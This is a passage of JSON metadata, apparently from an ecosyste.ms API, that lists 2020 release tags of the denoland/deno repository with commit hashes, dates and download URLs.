":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github